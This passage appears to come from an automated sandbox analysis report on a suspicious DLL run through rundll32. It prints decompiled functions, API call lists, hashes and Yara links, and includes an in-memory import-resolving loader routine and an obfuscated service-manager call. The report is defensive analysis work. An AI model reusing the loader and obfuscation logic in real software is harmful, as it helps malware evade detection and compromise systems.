                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AllocHeap_free_malloc
                                              • String ID:
                                              • API String ID: 2734353464-0
                                              • Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                              • Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
                                              • Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
                                              • Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 1000883C, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10010da8);
				E10008040(__ebx, __edi, __esi);
				_t31 = E10006087();
				_t25 =  *0x10012ae4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E100091AB(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10012394; // 0x10012690
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10012690;
								if(__eflags != 0) {
									E10004732(_t33);
								}
							}
						}
						_t20 =  *0x10012394; // 0x10012690
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10012394; // 0x10012690
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100088D8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E10008085(_t33);
			}









                                              0x1000883c
                                              0x1000883c
                                              0x1000883c
                                              0x1000883e
                                              0x10008843
                                              0x1000884d
                                              0x1000884f
                                              0x10008858
                                              0x10008879
                                              0x1000887f
                                              0x10008883
                                              0x10008886
                                              0x10008889
                                              0x1000888f
                                              0x10008891
                                              0x10008893
                                              0x1000889c
                                              0x1000889e
                                              0x100088a0
                                              0x100088a6
                                              0x100088a9
                                              0x100088ae
                                              0x100088a6
                                              0x1000889e
                                              0x100088af
                                              0x100088b4
                                              0x100088b7
                                              0x100088bd
                                              0x100088c1
                                              0x100088c1
                                              0x100088c7
                                              0x100088ce
                                              0x10008860
                                              0x10008860
                                              0x10008860
                                              0x10008863
                                              0x10008865
                                              0x10008869
                                              0x1000886e
                                              0x10008876

                                              APIs
                                                • Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
                                                • Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095
                                              • __amsg_exit.LIBCMT ref: 10008869
                                              • __lock.LIBCMT ref: 10008879
                                              • InterlockedDecrement.KERNEL32(?), ref: 10008896
                                              • _free.LIBCMT ref: 100088A9
                                              • InterlockedIncrement.KERNEL32(10012690), ref: 100088C1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                              • String ID:
                                              • API String ID: 1231874560-0
                                              • Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                              • Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
                                              • Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
                                              • Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10001470, Relevance: 6.4, APIs: 5, Instructions: 143COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E10001470(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _t44;
				signed short _t56;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				void _t71;
				signed short* _t72;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				signed short* _t82;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				_t65 =  *_t78;
				_t2 = _t78 + 4; // 0x4d8d5010
				_t79 =  *_t2;
				_a4 = _t79;
				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
					L22:
					return 1;
				} else {
					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
					_v12 = _t67;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						while(1) {
							_t44 =  *((intOrPtr*)(_t67 + 0xc));
							if(_t44 == 0) {
								goto L22;
							}
							_t8 = _t78 + 0x28; // 0x12f7805
							_t9 = _t78 + 0x1c; // 0xe58b0000
							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
							_t85 = _t84 + 8;
							_v8 = _t80;
							if(_t80 == 0) {
								SetLastError(0x7e);
								return 0;
							} else {
								_t11 = _t78 + 0xc; // 0xd0ff0000
								_t14 = _t78 + 8; // 0x637e8ef
								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
								_t84 = _t85 + 8;
								if(_t70 == 0) {
									_t40 = _t78 + 0x28; // 0x12f7805
									_t41 = _t78 + 0x24; // 0x39c033cc
									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
									SetLastError(0xe);
									return 0;
								} else {
									_t15 = _t78 + 0xc; // 0xd0ff0000
									 *((intOrPtr*)(_t78 + 8)) = _t70;
									_t77 = _t80;
									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t71 =  *_t67;
									if(_t71 == 0) {
										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
										_t72 = _t82;
									} else {
										_t64 = _a4;
										_t82 = _t71 + _t64;
										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
									}
									_t56 =  *_t82;
									if(_t56 == 0) {
										L17:
										_t67 = _t67 + 0x14;
										_v12 = _t67;
										if(IsBadReadPtr(_t67, 0x14) != 0) {
											goto L22;
										} else {
											_t79 = _a4;
											continue;
										}
									} else {
										_t73 = _t72 - _t82;
										_v16 = _t73;
										while(1) {
											_t27 = _t78 + 0x28; // 0x12f7805
											_push( *_t27);
											_t68 = _t73 + _t82;
											if(_t56 >= 0) {
												_t58 = _t56 + _a4 + 2;
											} else {
												_t58 = _t56 & 0x0000ffff;
											}
											_t30 = _t78 + 0x20; // 0xccccc35d
											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
											_t84 = _t84 + 0xc;
											 *_t68 = _t60;
											if(_t60 == 0) {
												break;
											}
											_t56 = _t82[2];
											_t73 = _v16;
											_t77 = _v8;
											_t82 =  &(_t82[2]);
											if(_t56 != 0) {
												continue;
											} else {
												_t67 = _v12;
												goto L17;
											}
											goto L23;
										}
										_t37 = _t78 + 0x28; // 0x12f7805
										_t39 = _t78 + 0x24; // 0x39c033cc
										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
										SetLastError(0x7f);
										return 0;
									}
								}
							}
							goto L23;
						}
					}
					goto L22;
				}
				L23:
			}

























                                              0x10001479
                                              0x1000147c
                                              0x1000147e
                                              0x1000147e
                                              0x10001488
                                              0x1000148b
                                              0x100015db
                                              0x100015e4
                                              0x10001491
                                              0x10001497
                                              0x1000149c
                                              0x100014a7
                                              0x100014b0
                                              0x100014b0
                                              0x100014b5
                                              0x00000000
                                              0x00000000
                                              0x100014bb
                                              0x100014c1
                                              0x100014c6
                                              0x100014c8
                                              0x100014cb
                                              0x100014d0
                                              0x100015c8
                                              0x100015d6
                                              0x100014d6
                                              0x100014d6
                                              0x100014e1
                                              0x100014e9
                                              0x100014eb
                                              0x100014f0
                                              0x100015a7
                                              0x100015aa
                                              0x100015ae
                                              0x100015b5
                                              0x100015c3
                                              0x100014f6
                                              0x100014f6
                                              0x100014f9
                                              0x100014fc
                                              0x100014fe
                                              0x10001501
                                              0x10001504
                                              0x10001508
                                              0x1000151a
                                              0x1000151d
                                              0x1000150a
                                              0x1000150a
                                              0x1000150d
                                              0x10001513
                                              0x10001513
                                              0x1000151f
                                              0x10001523
                                              0x1000156a
                                              0x1000156a
                                              0x10001570
                                              0x1000157b
                                              0x00000000
                                              0x1000157d
                                              0x1000157d
                                              0x00000000
                                              0x1000157d
                                              0x10001525
                                              0x10001525
                                              0x10001527
                                              0x10001530
                                              0x10001530
                                              0x10001530
                                              0x10001533
                                              0x10001538
                                              0x10001545
                                              0x1000153a
                                              0x1000153a
                                              0x1000153a
                                              0x10001548
                                              0x1000154c
                                              0x1000154e
                                              0x10001551
                                              0x10001555
                                              0x00000000
                                              0x00000000
                                              0x10001557
                                              0x1000155a
                                              0x1000155d
                                              0x10001560
                                              0x10001565
                                              0x00000000
                                              0x10001567
                                              0x10001567
                                              0x00000000
                                              0x10001567
                                              0x00000000
                                              0x10001565
                                              0x10001585
                                              0x1000158b
                                              0x1000158f
                                              0x10001596
                                              0x100015a4
                                              0x100015a4
                                              0x10001523
                                              0x100014f0
                                              0x00000000
                                              0x100014d0
                                              0x100014b0
                                              0x00000000
                                              0x100014a7
                                              0x00000000

                                              APIs
                                              • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
                                              • SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8
                                                • Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA
                                              • IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
                                              • SetLastError.KERNEL32(0000007F), ref: 10001596
                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorLast$Read$QueryVirtual
                                              • String ID:
                                              • API String ID: 4108280708-0
                                              • Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                              • Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
                                              • Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                              • Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 1000A35A, Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000476A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10005EC6();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                              0x1000a362
                                              0x1000a367
                                              0x1000a381
                                              0x00000000
                                              0x1000a381
                                              0x1000a369
                                              0x1000a36e
                                              0x00000000
                                              0x00000000
                                              0x1000a373
                                              0x1000a38e
                                              0x1000a393
                                              0x1000a396
                                              0x1000a39d
                                              0x1000a3bc
                                              0x1000a3c3
                                              0x1000a3c5
                                              0x1000a409
                                              0x1000a411
                                              0x1000a420
                                              0x1000a426
                                              0x1000a428
                                              0x1000a438
                                              0x1000a438
                                              0x1000a43c
                                              0x1000a43e
                                              0x1000a441
                                              0x1000a441
                                              0x1000a441
                                              0x1000a441
                                              0x00000000
                                              0x1000a447
                                              0x1000a42a
                                              0x1000a42a
                                              0x1000a42f
                                              0x1000a42f
                                              0x1000a432
                                              0x00000000
                                              0x1000a432
                                              0x1000a3c7
                                              0x1000a3ca
                                              0x1000a3ce
                                              0x1000a3f7
                                              0x1000a3f7
                                              0x1000a3fa
                                              0x1000a3fa
                                              0x00000000
                                              0x00000000
                                              0x1000a3fc
                                              0x1000a400
                                              0x00000000
                                              0x00000000
                                              0x1000a402
                                              0x1000a402
                                              0x00000000
                                              0x1000a402
                                              0x1000a3d0
                                              0x1000a3d3
                                              0x00000000
                                              0x00000000
                                              0x1000a3d7
                                              0x1000a3ea
                                              0x1000a3f0
                                              0x1000a3f3
                                              0x1000a3f5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x1000a3f5
                                              0x1000a39f
                                              0x1000a3a2
                                              0x1000a3a4
                                              0x1000a3a9
                                              0x1000a3a9
                                              0x1000a3ae
                                              0x00000000
                                              0x1000a3ae
                                              0x1000a375
                                              0x1000a37a
                                              0x1000a37e
                                              0x1000a37e
                                              0x00000000

                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
                                              • __isleadbyte_l.LIBCMT ref: 1000A3BC
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                              • Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
                                              • Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                              • Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10006610, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 20%
                                              			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E10006C38(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E100042B0(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E10006E99(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E10006402(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E10004280(_t25, _t29);
					return _t25;
				}
				return _t25;
			}











                                              0x10006610
                                              0x10006610
                                              0x10006613
                                              0x10006618
                                              0x1000661b
                                              0x1000661d
                                              0x10006620
                                              0x10006623
                                              0x10006624
                                              0x10006627
                                              0x1000662c
                                              0x1000662c
                                              0x1000662f
                                              0x10006633
                                              0x10006636
                                              0x1000663b
                                              0x10006638
                                              0x10006638
                                              0x10006638
                                              0x1000663e
                                              0x10006643
                                              0x10006644
                                              0x10006647
                                              0x10006649
                                              0x1000664c
                                              0x1000664f
                                              0x10006650
                                              0x10006658
                                              0x1000665d
                                              0x10006661
                                              0x10006667
                                              0x1000666a
                                              0x1000666d
                                              0x10006670
                                              0x10006671
                                              0x10006674
                                              0x1000667f
                                              0x10006683
                                              0x00000000
                                              0x10006683
                                              0x1000668a

                                              APIs
                                              • ___BuildCatchObject.LIBCMT ref: 10006627
                                                • Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81
                                              • _UnwindNestedFrames.LIBCMT ref: 1000663E
                                              • ___FrameUnwindToState.LIBCMT ref: 10006650
                                              • CallCatchBlock.LIBCMT ref: 10006674
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                              • String ID:
                                              • API String ID: 2633735394-0
                                              • Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                              • Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
                                              • Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                              • Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 100032A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                              Download Yara Rule
                                              APIs
                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
                                              • GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,3C5A3040), ref: 100032E3
                                              Strings
                                              • Recipe (.recipe) Property Handler, xrefs: 100032A6
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FileFromModuleNameString
                                              • String ID: Recipe (.recipe) Property Handler
                                              • API String ID: 1402647516-129706424
                                              • Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                              • Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
                                              • Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                              • Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10001980, Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E10001980(void* _a4) {
				void* _t15;
				void* _t16;
				void* _t20;
				intOrPtr _t23;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t35;

				_t34 = _a4;
				if(_t34 == 0) {
					return _t15;
				}
				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
					_t30 =  *(_t34 + 4);
					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
				}
				if( *(_t34 + 8) == 0) {
					L10:
					_t16 =  *(_t34 + 4);
					if(_t16 != 0) {
						VirtualFree(_t16, 0, 0x8000);
					}
					return HeapFree(GetProcessHeap(), 0, _t34);
				} else {
					_t32 = 0;
					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
						L8:
						_t20 =  *(_t34 + 8);
						if(_t20 != 0) {
							VirtualFree(_t20, 0, 0x8000);
						}
						goto L10;
					} else {
						goto L5;
					}
					do {
						L5:
						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
						if(_t23 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
							_t35 = _t35 + 8;
						}
						_t32 = _t32 + 1;
					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
					goto L8;
				}
			}











                                              0x10001984
                                              0x10001989
                                              0x10001a09
                                              0x10001a09
                                              0x1000198f
                                              0x10001993
                                              0x100019a0
                                              0x100019a0
                                              0x100019a6
                                              0x100019e2
                                              0x100019e2
                                              0x100019e7
                                              0x100019f1
                                              0x100019f1
                                              0x00000000
                                              0x100019a8
                                              0x100019a9
                                              0x100019ae
                                              0x100019cc
                                              0x100019cc
                                              0x100019d2
                                              0x100019dc
                                              0x100019dc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x100019b0
                                              0x100019b0
                                              0x100019b3
                                              0x100019b8
                                              0x100019c1
                                              0x100019c3
                                              0x100019c3
                                              0x100019c6
                                              0x100019c7
                                              0x00000000
                                              0x100019b0

                                              APIs
                                              • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
                                              • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
                                              • GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
                                              • HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Free$HeapVirtual$Process
                                              • String ID:
                                              • API String ID: 3505259878-0
                                              • Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                              • Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
                                              • Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                              • Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: rundll32.exe PID: 2468 Parent PID: 2724 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 002A2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E002A2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E002A602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002B07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x002a295f
                                              0x002a2964
                                              0x002a2967
                                              0x002a296a
                                              0x002a296d
                                              0x002a296e
                                              0x002a296f
                                              0x002a2977
                                              0x002a2985
                                              0x002a298a
                                              0x002a2992
                                              0x002a299a
                                              0x002a29a2
                                              0x002a29a9
                                              0x002a29b0
                                              0x002a29b7
                                              0x002a29bb
                                              0x002a29cf
                                              0x002a29dc
                                              0x002a29e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002A29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
